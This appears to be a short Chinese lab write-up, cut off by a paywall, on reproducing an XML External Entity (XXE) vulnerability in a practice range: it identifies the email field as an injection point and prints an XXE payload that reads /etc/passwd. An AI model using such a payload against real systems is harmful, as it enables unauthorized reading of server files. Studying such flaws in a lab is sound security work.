本文通过靶场复现了一个XXE(XML External Entity)漏洞,首先在电子邮件功能中发现了一个注入点,该点返回了错误信息,暗示了XML解析的潜在风险。通过对XML输入的操纵,可以进一步探索此漏洞并了解其危害。
靶场
1.找注入点
发现在电子邮件中 返回了报错信息,为注入点
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY abc SYSTEM "file:///etc/passwd">]>
<root><name>1</name>
<tel>2</tel>
<email>&abc;</email>
<password>4</password></root>
最低0.47元/天 解锁文章
扫一扫
评论 2
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
